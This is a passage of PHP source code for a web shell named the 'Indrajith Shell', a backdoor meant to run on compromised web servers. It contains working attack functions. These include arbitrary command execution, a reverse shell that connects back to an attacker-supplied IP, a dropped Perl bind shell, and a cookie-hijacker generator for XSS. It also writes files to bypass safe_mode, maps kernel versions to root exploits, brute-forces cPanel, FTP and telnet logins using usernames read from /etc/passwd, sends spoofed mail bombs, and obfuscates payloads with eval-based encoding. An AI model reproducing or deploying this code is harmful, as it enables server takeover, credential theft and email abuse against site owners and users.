  619. New File Name : <input size='40' name='new_f_name' value=".$_GET['new_file']."></font><br /><br /><hr /><br /><center>
  620. <textarea spellcheck='false' cols='80' rows='25' class=textarea_edit name='n_file_content'></textarea></center><hr />
  621. <input class='input_big' type='submit' value=' Save ' /></form></center></div>";
  622. }
  623. function mk_file_bg()
  624. {
  625. chdir($_GET['path']);
  626. $c_path=$_GET['path'];
  627. $c_file=$_GET['new_f_name'];
  628. $c_file_contents=$_GET['n_file_content'];
  629. $handle=fopen($c_file, "w");
  630. if(!$handle)
  631. {
  632. alert("Permission Denied");
  633. }
  634. else
  635. {
  636. fwrite($handle,$c_file_contents);
  637. alert("Your changes were Successfully Saved!");
  638. }
  639. fclose($handle);
  640. }
  641. function create_dir()
  642. {
  643. chdir($_GET['path']);
  644. $new_dir=$_GET['new_dir'];
  645. if(is_writable($_GET['path']))
  646. {
  647. mkdir($new_dir);
  648. alert("Direcory Created Successfully");
  649. exit;
  650. }
  651. else
  652. {
  653. alert("Access Denied for this Operation");
  654. exit;
  655. }
  656. }
  657. function cmd($cmd)
  658. {
  659. chdir($_GET['path']);
  660. $res="";
  661. if($_GET['cmdexe'])
  662. {
  663. $cmd=$_GET['cmdexe'];
  664. }
  665. if(function_exists('shell_exec'))
  666. {
  667. $res=shell_exec($cmd);
  668. }
  669. else if(function_exists('exec'))
  670. {
  671. exec($cmd,$res);
  672. $res=join("\n",$res);
  673. }
  674. else if(function_exists('system'))
  675. {
  676. ob_start();
  677. system($cmd);
  678. $res = ob_get_contents();
  679. ob_end_clean();
  680. }
  681. elseif(function_exists('passthru'))
  682. {
  683. ob_start();
  684. passthru($cmd);
  685. $res=ob_get_contents();
  686. ob_end_clean();
  687. }
  688. else if(function_exists('proc_open'))
  689. {
  690. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  691. $handle = proc_open($cmd ,$descriptorspec , $pipes);
  692. if(is_resource($handle))
  693. {
  694. if(function_exists('fread') && function_exists('feof'))
  695. {
  696. while(!feof($pipes[1]))
  697. {
  698. $res .= fread($pipes[1], 512);
  699. }
  700. }
  701. else if(function_exists('fgets') && function_exists('feof'))
  702. {
  703. while(!feof($pipes[1]))
  704. {
  705. $res .= fgets($pipes[1],512);
  706. }
  707. }
  708. }
  709. pclose($handle);
  710. }
  711. else if(function_exists('popen'))
  712. {
  713. $handle = popen($cmd , "r");
  714. if(is_resource($handle))
  715. {
  716. if(function_exists('fread') && function_exists('feof'))
  717. {
  718. while(!feof($handle))
  719. {
  720. $res .= fread($handle, 512);
  721. }
  722. }
  723. else if(function_exists('fgets') && function_exists('feof'))
  724. {
  725. while(!feof($handle))
  726. {
  727. $res .= fgets($handle,512);
  728. }
  729. }
  730. }
  731. pclose($handle);
  732. }
  733. $res=wordwrap(htmlspecialchars($res));
  734. if($_GET['cmdexe'])
  735. {
  736. echo "<div id=result><center><font color=green><h2>r00t@TOF:~#</h2></center><hr /><pre>".$res."</font></pre></div>";
  737. }
  738. return $res;
  739. }
  740. function upload_file()
  741. {
  742. chdir($_POST['path']);
  743. if(move_uploaded_file($_FILES['upload_f']['tmp_name'],$_FILES['upload_f']['name']))
  744. {
  745. alert("Uploaded File Successfully");
  746. }
  747. else
  748. {
  749. alert("Access Denied!!!");
  750. }
  751. }
  752. function reverse_conn_ui()
  753. {
  754. global $your_ip;
  755. echo "<div id='result'>
  756. <center><h2>Reverse Shell</h2><hr />
  757. <br /><br /><form method='GET'><table class=tbl>
  758. <tr>
  759. <td><select name='rev_option' style='color:green; background-color:black; border:1px solid #666;'>
  760. <option>PHP Reverse Shell</option>
  761. <option>PERL Bind Shell</option>
  762. </select></td></tr><tr>
  763. <td>Your IP : <input name='my_ip' value=".$your_ip.">
  764. PORT : <input name='my_port' value='560'>
  765. <input type='submit' value=' >> ' /></td></tr></form>
  766. <tr></tr>
  767. <tr><td><font color=red>PHP Reverse Shell</font> : <font color=green> nc -l -p <i>port</i></font></td></tr><tr><td><font color=red>PERL Bind Shell</font> : <font color=green> nc <i>server_ip port</i></font></td></tr></table> </div>";
  768. }
  769. function reverse_conn_bg()
  770. {
  771. global $os;
  772. $option=$_REQUEST['rev_option'];
  773. $ip=$_GET['my_ip'];
  774. $port=$_GET['my_port'];
  775. if($option=="PHP Reverse Shell")
  776. {
  777. echo "<div id=result><h2>RESULT</h2><hr /><br />";
  778. function printit ($string)
  779. {
  780. if (!$daemon)
  781. {
  782. print "$string\n";
  783. }
  784. }
  785. $chunk_size = 1400;
  786. $write_a = null;
  787. $error_a = null;
  788. $shell = 'uname -a; w; id; /bin/sh -i';
  789. $daemon = 0;
  790. $debug = 0;
  791. if (function_exists('pcntl_fork'))
  792. {
  793. $pid = pcntl_fork();
  794. if ($pid == -1)
  795. {
  796. printit("ERROR: Can't fork");
  797. exit(1);
  798. }
  799. if ($pid)
  800. {
  801. exit(0);
  802. }
  803. if (posix_setsid() == -1)
  804. {
  805. printit("Error: Can't setsid()");
  806. exit(1);
  807. }
  808. $daemon = 1;
  809. }
  810. else
  811. {
  812. printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
  813. }
  814. chdir("/");
  815. umask(0);
  816. $sock = fsockopen($ip, $port, $errno, $errstr, 30);
  817. if (!$sock)
  818. {
  819. printit("$errstr ($errno)");
  820. exit(1);
  821. }
  822. $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
  823. $process = proc_open($shell, $descriptorspec, $pipes);
  824. if (!is_resource($process))
  825. {
  826. printit("ERROR: Can't spawn shell");
  827. exit(1);
  828. }
  829. stream_set_blocking($pipes[0], 0);
  830. stream_set_blocking($pipes[1], 0);
  831. stream_set_blocking($pipes[2], 0);
  832. stream_set_blocking($sock, 0);
  833. printit("<font color=green>Successfully opened reverse shell to $ip:$port </font>");
  834. while (1)
  835. {
  836. if (feof($sock))
  837. {
  838. printit("ERROR: Shell connection terminated");
  839. break;
  840. }
  841. if (feof($pipes[1]))
  842. {
  843. printit("ERROR: Shell process terminated");
  844. break;
  845. }
  846. $read_a = array($sock, $pipes[1], $pipes[2]);
  847. $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
  848. if (in_array($sock, $read_a))
  849. {
  850. if ($debug) printit("SOCK READ");
  851. $input = fread($sock, $chunk_size);
  852. if ($debug) printit("SOCK: $input");
  853. fwrite($pipes[0], $input);
  854. }
  855. if (in_array($pipes[1], $read_a))
  856. {
  857. if ($debug) printit("STDOUT READ");
  858. $input = fread($pipes[1], $chunk_size);
  859. if ($debug) printit("STDOUT: $input");
  860. fwrite($sock, $input);
  861. }
  862. if (in_array($pipes[2], $read_a))
  863. {
  864. if ($debug) printit("STDERR READ");
  865. $input = fread($pipes[2], $chunk_size);
  866. if ($debug) printit("STDERR: $input");
  867. fwrite($sock, $input);
  868. }
  869. }
  870. fclose($sock);
  871. fclose($pipes[0]);
  872. fclose($pipes[1]);
  873. fclose($pipes[2]);
  874. proc_close($process);
  875. echo "<br /><br /><hr /><br /><br /></div>";
  876. }
  877. else if($option=="PERL Bind Shell")
  878. {
  879. global $bind_perl, $os;
  880. $pbfl=$bind_perl;
  881. $handlr=fopen("indrajith_perl_bind.pl", "wb");
  882. if($handlr)
  883. {
  884. fwrite($handlr, gzinflate(base64_decode($bind_perl)));
  885. }
  886. else
  887. {
  888. alert("Access Denied for create new file");
  889. }
  890. fclose($handlr);
  891. if(file_exists("indrajith_perl_bind.pl"))
  892. {
  893. if($os=="nix")
  894. {
  895. cmd("chmod +x indrajith_perl_bind.pl;perl indrajith_perl_bind.pl $port");
  896. }
  897. else
  898. {
  899. cmd("perl indrajith_perl_bind.pl $port");
  900. }
  901. }
  902. }
  903. }
  904. function cookie_jack()
  905. {
  906. global $cookie_highjacker;
  907. echo "<div id=result><center><h2>NOTICE</h2><hr/>";
  908. if(function_exists('fopen') && function_exists('fwrite'))
  909. {
  910. $cook=gzinflate(base64_decode($cookie_highjacker));
  911. $han_le=fopen("jith_cookie.php", "w+");
  912. if($han_le)
  913. {
  914. fwrite($han_le, $cook);
  915. echo "Yes... Cookie highjacker is generated.<br /> Name : <a style='color:green;' target=_blank href=jith_cookie.php>jith_cookie.php</a></font>.<br /> Rename it as 404.php or what you like and highjack cookie of your target.<br />It is usefull in XSS<br />It will make a file <font color=red>configuration.txt</font> in this direcory and save the cookie value in it. :p cheers...<br /><br /><hr /><br /><br /></center></div>";
  916. }
  917. else
  918. {
  919. echo "<font color=red>Sorry... Generate COOKIE HIGHJACKER failed<br /><br /><hr /><br /><br /></center></div>";
  920. }
  921. }
  922. }
  923. function safe_mode_fuck()
  924. {
  925. global $s_php_ini,$s_htaccess,$s_htaccess_pl,$ini_php;
  926. $path = chdir($_GET['path']);
  927. chdir($_GET['path']);
  928. switch($_GET['safe_mode'])
  929. {
  930. case "s_php_ini":
  931. $s_file=$s_php_ini;
  932. $s_name="php.ini";
  933. break;
  934. case "s_htaccess":
  935. $s_name=".htaccess";
  936. $s_file=$s_htaccess;
  937. break;
  938. case "s_htaccess_pl":
  939. $s_name=".htaccess";
  940. $s_file=$s_htaccess_pl;
  941. break;
  942. case "s_ini_php":
  943. $s_name="ini.php";
  944. $s_file=$ini_php;
  945. break;
  946. }
  947. if(function_exists('fopen')&& function_exists('fwrite'))
  948. {
  949. $s_handle=fopen("$s_name", "w+");
  950. if($s_handle)
  951. {
  952. fwrite($s_handle, $s_file);
  953. alert("Operation Succeed!!!");
  954. }
  955. else
  956. {
  957. alert("Access Denied!!!");
  958. }
  959. fclose($s_handle);
  960. }
  961. }
  962. function safe_mode_fuck_ui()
  963. {
  964. global $path;
  965. $path=getcwd();
  966. echo "<div id=result><br /><center><h2>Select Your Options</h2><hr />
  967. <table class=tbl size=10><tr><td><a href=?path={$path}&safe_mode=s_php_ini>PHP.INI</a></td><td><a href=?path={$path}&safe_mode=s_htaccess>.HTACCESS</a></td><td><a href=?path={$path}&safe_mode=s_htaccess_pl>.HTACCESS(perl)</td><td><a href=?path={$path}&safe_mode=s_ini_php>INI.PHP</td></tr></table><br /><br /></div>";
  968. }
  969. function AccessDenied()
  970. {
  971. global $path, $forbid_dir;
  972. $path=$_GET['path'];
  973. chdir($path);
  974. if(function_exists('fopen') && function_exists('fwrite'))
  975. {
  976. $forbid=fopen(".htaccess", "wb");
  977. if($forbid)
  978. {
  979. fwrite($forbid, $forbid_dir);
  980. alert("Opreation Succeeded");
  981. }
  982. else
  983. {
  984. alert("Access Denied");
  985. }
  986. fclose($forbid);
  987. }
  988. }
  989. function r00t_exploit()
  990. {
  991. $kernel = php_uname();
  992. $r00t_db = array('2.6.19'=>'jessica','2.6.20'=>'jessica','2.6.21'=>'jessica','2.6.22'=>'jessica','2.6.23'=>'jessica, vmsplice','2.6.24'=>'jessica, vmspice','2.6.31'=>'enlightment','2.6.18'=>'brk, ptrace, kmod, brk2','2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip,ptrace');
  993. foreach($r00t_db as $kern=>$exp)
  994. {
  995. if(strstr($kernel, $kern))
  996. {
  997. return $exp;
  998. }
  999. else
  1000. {
  1001. $exp='<font color="red">Not found.</font>';
  1002. return $exp;
  1003. }
  1004. }
  1005. }
  1006. function php_ende_ui()
  1007. {
  1008. echo "<div id=result><center><h2>PHP ENCODE/DECODE</h2></center><hr /><form method='post'><table class=tbl>
  1009. <tr><td>
  1010. Method : <select name='typed' style='color:green; background-color:black; border:1px solid #666;'><option>Encode</option><option>Decode</decode></select> TYPE : <select name='typenc' style='color:green; background-color:black; border:1px solid #666;'><option>GZINFLATE</option><option>GZUNCOMPRESS</option><option>STR_ROT13</option></tr>
  1011. </td><tr><td><textarea spellcheck='false' class=textarea_edit cols='80' rows='25' name='php_content'>INPUT YOUR CONTENT TO ENCODE/DECODE
  1012. For Encode Input your full source code.
  1013. For Decode Input the encoded part only.</textarea></tr></td></table><hr /><input class='input_big' type='submit' value=' >> ' /><br /><hr /><br /><br /></form></div>";
  1014. }
  1015. function php_ende_bg()
  1016. {
  1017. $meth_d=$_POST['typed'];
  1018. $typ_d=$_POST['typenc'];
  1019. $c_ntent=$_POST['php_content'];
  1020. $c_ntent=$c_ntent;
  1021. switch($meth_d)
  1022. {
  1023. case "Encode":
  1024. switch($typ_d)
  1025. {
  1026. case "GZINFLATE":
  1027. $res_t=base64_encode(gzdeflate(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1028. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzinflate(base64_decode(\"$res_t\"))); ?>";
  1029. break;
  1030. case "GZUNCOMPRESS":
  1031. $res_t=base64_encode(gzcompress(trim(stripslashes($c_ntent.' '),'<?php, ?>'),9));
  1032. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(gzuncompress(base64_decode(\"$res_t\"))); ?>";
  1033. break;
  1034. case "STR_ROT13":
  1035. $res_t=trim(stripslashes($c_ntent.' '),'<?php, ?>');
  1036. $res_t=base64_encode(str_rot13($res_t));
  1037. $res_t="<?php /* Encoded in INDRAJITH SHELL PROJECT */ eval(str_rot13(base64_decode(\"$res_t\"))); ?>";
  1038. break;
  1039. }
  1040. break;
  1041. case "Decode":
  1042. switch($typ_d)
  1043. {
  1044. case "GZINFLATE":
  1045. $res_t=gzinflate(base64_decode($c_ntent));
  1046. break;
  1047. case "GZUNCOMPRESS":
  1048. $res_t=gzuncompress(base64_decode($c_ntent));
  1049. break;
  1050. case "STR_ROT13":
  1051. $res_t=str_rot13(base64_decode($c_ntent));
  1052. break;
  1053. }
  1054. break;
  1055. }
  1056. echo "<div id=result><center><h2>INDRAJITH SHELL</h2><hr /><textarea spellcheck='false' class=textarea_edit cols='80' rows='25'>".htmlspecialchars($res_t)."</textarea></center></div>";
  1057. }
  1058. function massmailer_ui()
  1059. {
  1060. echo "<div id=result><center><h2>MASS MAILER & MAIL BOMBER</h2><hr /><table class=tbl width=40 style='col-width:40'><td><table class=tbl><tr style='float:left;'><td><font color=green size=4>Mass Mail</font></td></tr><form method='POST'><tr style='float:left;'><td> FROM : </td><td><input name='from' size=40 value='ajithkp560@fbi.gov'></td></tr><tr style='float:left;'><td>TO :</td><td><input size=40 name='to_mail' value='ajithkp560@gmail.com,ajithkp560@yahoo.com'></td></tr><tr style='float:left;'><td>Subject :</td><td><input size=40 name='subject_mail' value='Hi, GuyZ'></td></tr><tr style='float:left;'><td><textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='mail_content'>I'm doing massmail :p</textarea></td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table></td>
  1061. <form method='post'><td> <table class='tbl'><td><font color=green size=4>Mail Bomber</font></td></tr><tr style='float:left;'><td>TO : </td><td><input size=40 name='bomb_to' value='ajithkp560@gmail.com,ajithkp560_mail_bomb@fbi.gov'></td></tr><tr style='float:left;'><td>Subject : </td><td><input size=40 name='bomb_subject' value='Bombing with messages'></td></tr><tr style='float:left;'><td>No. of times</td><td><input size=40 name='bomb_no' value='100'></td></tr><tr style='float:left;'><td> <textarea spellcheck='false' class=textarea_edit cols='34' rows='10' name='bmail_content'>I'm doing E-Mail Bombing :p</textarea> </td><td><input class='input_big' type='submit' value=' >> '></td></tr></form></table> </td></tr></table>";
  1062. }
  1063. function massmailer_bg()
  1064. {
  1065. $from=$_POST['from'];
  1066. $to=$_POST['to_mail'];
  1067. $subject=$_POST['subject_mail'];
  1068. $message=$_POST['mail_content'];
  1069. if(function_exists('mail'))
  1070. {
  1071. if(mail($to,$subject,$message,"From:$from"))
  1072. {
  1073. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Send... :p</font><br /><br /><hr /><br /><br />";
  1074. }
  1075. else
  1076. {
  1077. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1078. }
  1079. }
  1080. else
  1081. {
  1082. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Sending... :(</font><br /><br /><hr /><br /><br />";
  1083. }
  1084. }
  1085. function mailbomb_bg()
  1086. {
  1087. $rand=rand(0, 9999999);
  1088. $to=$_POST['bomb_to'];
  1089. $from="president_$rand@whitewhitehouse.gov";
  1090. $subject=$_POST['bomb_subject']." ID ".$rand;
  1091. $times=$_POST['bomb_no'];
  1092. $content=$_POST['bmail_content'];
  1093. if($times=='')
  1094. {
  1095. $times=1000;
  1096. }
  1097. while($times--)
  1098. {
  1099. if(function_exists('mail'))
  1100. {
  1101. if(mail($to,$subject,$content,"From:$from"))
  1102. {
  1103. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=green size=4>Successfully Mails Bombed... :p</font><br /><br /><hr /><br /><br />";
  1104. }
  1105. else
  1106. {
  1107. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1108. }
  1109. }
  1110. else
  1111. {
  1112. echo "<div id=result><center><h2>MAIL BOMBING</h2><hr /><br /><br /><font color=red size=4>Sorry, failed to Mails Bombing... :(</font><br /><br /><hr /><br /><br />";
  1113. }
  1114. }
  1115. }
  1116. /* ----------------------- CPANEL CRACK is Copied from cpanel cracker ----------*/
  1117. /*------------------------ Credit Goes to Them ---------------------------------*/
  1118. function cpanel_check($host,$user,$pass,$timeout)
  1119. {
  1120. set_time_limit(0);
  1121. global $cpanel_port;
  1122. $ch = curl_init();
  1123. curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port);
  1124. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1125. curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
  1126. curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
  1127. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  1128. curl_setopt($ch, CURLOPT_FAILONERROR, 1);
  1129. $data = curl_exec($ch);
  1130. if ( curl_errno($ch) == 28 )
  1131. {
  1132. print "<b><font color=orange>Error :</font> <font color=red>Connection Timeout. Please Check The Target Hostname .</font></b>";
  1133. exit;
  1134. }
  1135. else if (curl_errno($ch) == 0 )
  1136. {
  1137. print "<b><font face=\"Tahoma\" style=\"font-size: 9pt\" color=\"orange\">[~]</font></b><font face=\"Tahoma\" style=\"font-size: 9pt\"><b><font color=\"green\">
  1138. Cracking Success With Username "</font><font color=\"#FF0000\">$user</font><font color=\"#008000\">\" and Password \"</font><font color=\"#FF0000\">$pass</font><font color=\"#008000\">\"</font></b><br><br>";
  1139. }
  1140. curl_close($ch);
  1141. }
  1142. function cpanel_crack()
  1143. {
  1144. set_time_limit(0);
  1145. global $os;
  1146. echo "<div id=result>";
  1147. $cpanel_port="2082";
  1148. $connect_timeout=5;
  1149. if(!isset($_POST['username']) && !isset($_POST['password']) && !isset($_POST['target']) && !isset($_POST['cracktype']))
  1150. {
  1151. ?>
  1152. <center>
  1153. <form method=post>
  1154. <table class=tbl>
  1155. <tr>
  1156. <td align=center colspan=2>Target : <input type=text name="server" value="localhost" class=sbox></td>
  1157. </tr>
  1158. <tr>
  1159. <td align=center>User names</td><td align=center>Password</td>
  1160. </tr>
  1161. <tr>
  1162. <td align=center><textarea spellcheck='false' class=textarea_edit name=username rows=25 cols=35 class=box><?php
  1163. if($os != "win")
  1164. {
  1165. if(@file('/etc/passwd'))
  1166. {
  1167. $users = file('/etc/passwd');
  1168. foreach($users as $user)
  1169. {
  1170. $user = explode(':', $user);
  1171. echo $user[0] . "\n";
  1172. }
  1173. }
  1174. else
  1175. {
  1176. $temp = "";
  1177. $val1 = 0;
  1178. $val2 = 1000;
  1179. for(;$val1 <= $val2;$val1++)
  1180. {
  1181. $uid = @posix_getpwuid($val1);
  1182. if ($uid)
  1183. $temp .= join(':',$uid)."\n";
  1184. }
  1185. $temp = trim($temp);
  1186. if($file5 = fopen("test.txt","w"))
  1187. {
  1188. fputs($file5,$temp);
  1189. fclose($file5);
  1190. $file = fopen("test.txt", "r");
  1191. while(!feof($file))
  1192. {
  1193. $s = fgets($file);
  1194. $matches = array();
  1195. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  1196. $matches = str_replace("home/","",$matches[1]);
  1197. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  1198. continue;
  1199. echo $matches;
  1200. }
  1201. fclose($file);
  1202. }
  1203. }
  1204. }
  1205. ?></textarea></td><td align=center><textarea spellcheck='false' class=textarea_edit name=password rows=25 cols=35 class=box></textarea></td>
  1206. </tr>
  1207. <tr>
  1208. <td align=center colspan=2>Guess options : <label><input name="cracktype" type="radio" value="cpanel" checked> Cpanel(2082)</label><label><input name="cracktype" type="radio" value="ftp"> Ftp(21)</label><label><input name="cracktype" type="radio" value="telnet"> Telnet(23)</label></td>
  1209. </tr>
  1210. <tr>
  1211. <td align=center colspan=2>Timeout delay : <input type="text" name="delay" value=5 class=sbox></td>
  1212. </tr>
  1213. <tr>
  1214. <td align=center colspan=2><input type="submit" value=" Go " class=but></td>
  1215. </tr>
  1216. </table>
  1217. </form>
  1218. </center>
  1219. <?php
  1220. }
  1221. else
  1222. {
  1223. if(empty($_POST['username']) || empty($_POST['password']))
  1224. echo "<center>Please Enter The Users or Password List</center>";
  1225. else
  1226. {
  1227. $userlist=explode("\n",$_POST['username']);
  1228. $passlist=explode("\n",$_POST['password']);
  1229. if($_POST['cracktype'] == "ftp")
  1230. {
  1231. foreach ($userlist as $user)
  1232. {
  1233. $pureuser = trim($user);
  1234. foreach ($passlist as $password )
  1235. {
  1236. $purepass = trim($password);
  1237. ftp_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1238. }
  1239. }
  1240. }
  1241. if ($_POST['cracktype'] == "cpanel" || $_POST['cracktype'] == "telnet")
  1242. {
  1243. if($cracktype == "telnet")
  1244. {
  1245. $cpanel_port="23";
  1246. }
  1247. else
  1248. $cpanel_port="2082";
  1249. foreach ($userlist as $user)
  1250. {
  1251. $pureuser = trim($user);
  1252. echo "<b><font face=Tahoma style=\"font-size: 9pt\" color=#008000> [ - ] </font><font face=Tahoma style=\"font-size: 9pt\" color=#FF0800>
  1253. Processing user $pureuser ...</font></b><br><br>";
  1254. foreach ($passlist as $password )
  1255. {
  1256. $purepass = trim($password);
  1257. cpanel_check($_POST['target'],$pureuser,$purepass,$connect_timeout);
  1258. }
  1259. }
  1260. }
  1261. }
  1262. }
  1263. echo "</div>";
  1264. }
  1265. function get_users()
  1266. {
  1267. $userz = array();
  1268. $user = file("/etc/passwd");
  1269. foreach($user as $userx=>$usersz)
  1270. {
  1271. $userct = explode(":",$usersz);
  1272. array_push($userz,$userct[0]);
  1273. }
  1274. if(!$user)
  1275. {
  1276. if($opd = opendir("/home/"))
  1277. {
  1278. while(($file = readdir($opd))!== false)
  1279. {
  1280. array_push($userz,$file);
  1281. }
  1282. }
  1283. closedir($opd);
  1284. }
  1285. $userz=implode(', ',$userz);
  1286. return $userz;
  1287. }
  1288. function exploit_details()
  1289. {
  1290. global $os;
  1291. echo "<div id=result style='color:green;'><center>
  1292. <h2>Exploit Server Details</h2><hr /><br /><br /><table class=table style='color:green;text-align:center'><tr><td>
  1293. OS: <a style='color:7171C6;text-decoration:none;' target=_blank href='http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".php_uname(s)."'>".php_uname(s)."</td></tr>
  1294. <tr><td>PHP Version : <a style='color:7171C6;text-decoration:none;' target=_blank href='?phpinfo'>".phpversion().".</td></tr>
  1295. <tr><td>Kernel Release : <font color=7171C6>".php_uname(r)."</font></td></tr>
  1296. <tr><td>Kernel Version : <font color=7171C6>".php_uname(v)."</font></td></td>
  1297. <tr><td>Machine : <font color=7171C6>".php_uname(m)."</font></td</tr>
  1298. <tr><td>Server Software : <font color=7171C6>".$_SERVER['SERVER_SOFTWARE']."</font></td</tr><tr>";
  1299. if(function_exists('apache_get_modules'))
  1300. {
  1301. echo "<tr><td style='text-align:left;'>Loaded Apache modules : <br /><br /><font color=7171C6>";
  1302. echo implode(', ', apache_get_modules());
  1303. echo "</font></tr></td>";
  1304. }
  1305. if($os=='win')
  1306. {
  1307. echo "<tr><td style='text-align:left;'>Account Setting : <font color=7171C6><pre>".cmd('net accounts')."</pre></td></tr>
  1308. <tr><td style='text-align:left'>User Accounts : <font color=7171C6><pre>".cmd('net user')."</pre></td></tr>
  1309. ";
  1310. }
  1311. if($os=='nix')
  1312. {
  1313. echo "<tr><td style='text-align:left'>Distro : <font color=7171C6><pre>".cmd('cat /etc/*-release')."</pre></font></td></tr>
  1314. <tr><td style='text-align:left'>Distr name : <font color=7171C6><pre>".cmd('cat /etc/issue.net')."</pre></font></td></tr>
  1315. <tr><td style='text-align:left'>GCC : <font color=7171C6><pre>".cmd('whereis gcc')."</pre></td></tr>
  1316. <tr><td style='text-align:left'>PERL : <font color=7171C6><pre>".cmd('whereis perl')."</pre></td></tr>
  1317. <tr><td style='text-align:left'>PYTHON : <font color=7171C6><pre>".cmd('whereis python')."</pre></td></tr>
  1318. <tr><td style='text-align:left'>JAVA : <font color=7171C6><pre>".cmd('whereis java')."</pre></td></tr>
  1319. <tr><td style='text-align:left'>APACHE : <font color=7171C6><pre>".cmd('whereis apache')."</pre></td></tr>
  1320. <tr><td style='text-align:left;'>CPU : <br /><br /><pre><font color=7171C6>".cmd('cat /proc/cpuinfo')."</font></pre></td></tr>
  1321. <tr><td style='text-align:left'>RAM : <font color=7171C6><pre>".cmd('free -m')."</pre></td></tr>
  1322. <tr><td style='text-align:left'> User Limits : <br /><br /><font color=7171C6><pre>".cmd('ulimit -a')."</pre></td></tr>";
  1323. $useful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1324. $uze=array();
  1325. foreach($useful as $uzeful)
  1326. {
  1327. if(cmd("which $uzeful"))
  1328. {
  1329. $uze[]=$uzeful;
  1330. }
  1331. }
  1332. echo "<tr><td style='text-align:left'>Useful : <br /><font color=7171C6><pre>";
  1333. echo implode(', ',$uze);
  1334. echo "</pre></td></tr>";
  1335. $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1336. $uze=array();
  1337. foreach($downloaders as $downloader)
  1338. {
  1339. if(cmd("which $downloader"))
  1340. {
  1341. $uze[]=$downloader;
  1342. }
  1343. }
  1344. echo "<tr><td style='text-align:left'>Downloaders : <br /><font color=7171C6><pre>";
  1345. echo implode(', ',$uze);
  1346. echo "</pre></td></tr>";
  1347. echo "<tr><td style='text-align:left'>Users : <br /><font color=7171C6><pre>".wordwrap(get_users())."</pre</font>></td></tr>
  1348. <tr><td style='text-align:left'>Hosts : <br /><font color=7171C6><pre>".cmd('cat /etc/hosts')."</pre></font></td></tr>";
  1349. }
  1350. echo "</table><br /><br /><hr /><br /><br />";
  1351. }
  1352. function remote_file_check_ui()
  1353. {
  1354. echo "<div id=result><center><h2>Remote File Check</h2><hr /><br /><br />
  1355. <table class=tbl><form method='POST'><tr><td>URL : <input size=50 name='rem_web' value='http://www.ajithkp560.hostei.com/php/'></td></tr>
  1356. <tr><td><font color=red>Input File's Names in TextArea</font></tr></td><tr><td><textarea spellcheck='false' class='textarea_edit' cols=50 rows=30 name='tryzzz'>indrajith.php
  1357. ajithkp560.php
  1358. index.html
  1359. profile.php
  1360. c99.php
  1361. r57.php</textarea></td></tr>
  1362. <tr><td><br /><input type='submit' value=' >> ' class='input_big' /><br /><br /></td></tr></form></table><br /><br /><hr /><br /><br />";
  1363. }
  1364. function remote_file_check_bg()
  1365. {
  1366. set_time_limit(0);
